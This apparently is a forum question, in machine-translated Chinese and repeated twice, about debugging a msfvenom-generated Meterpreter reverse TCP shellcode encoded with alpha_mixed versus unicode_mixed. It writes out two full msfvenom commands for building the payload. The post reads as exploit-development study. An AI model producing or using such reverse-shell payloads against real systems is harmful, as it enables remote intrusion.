调试 unicode msfvenom 负载
Debug unicode msfvenom payload
我想调试一些 msfvenom 生成的负载。
当我以这种方式使用“标准”编码生成有效负载时,我完全能够做到这一点:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed BufferRegister=ECX
在这种情况下,我可以获得生成的有效载荷,使用类似 Blobrunner 的东西,我就可以开始了。
如果我使用 unicode 编码生成 shellcode
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed BufferRegister=ECX
同样是行不通的:我在处理 shellcode 时收到很多 duplicated/invalid 指令。这是有道理的,因为我想我正在将其作为正常编码进行管理。但是我该如何调试这个 shellcode 呢?有没有工具可以将其转换为“有效”序列并删除“unicode 填充”?
非常感谢!
我想我明白了:这只是在字节之间添加一个带有 00 的交错...简单...不知道为什么我之前错过了...
我想调试一些 msfvenom 生成的负载。
当我以这种方式使用“标准”编码生成有效负载时,我完全能够做到这一点:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed BufferRegister=ECX
在这种情况下,我可以获得生成的有效载荷,使用类似 Blobrunner 的东西,我就可以开始了。
如果我使用 unicode 编码生成 shellcode
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed BufferRegister=ECX
同样是行不通的:我在处理 shellcode 时收到很多 duplicated/invalid 指令。这是有道理的,因为我想我正在将其作为正常编码进行管理。但是我该如何调试这个 shellcode 呢?有没有工具可以将其转换为“有效”序列并删除“unicode 填充”?
非常感谢!
我想我明白了:这只是在字节之间添加一个带有 00 的交错...简单...不知道为什么我之前错过了...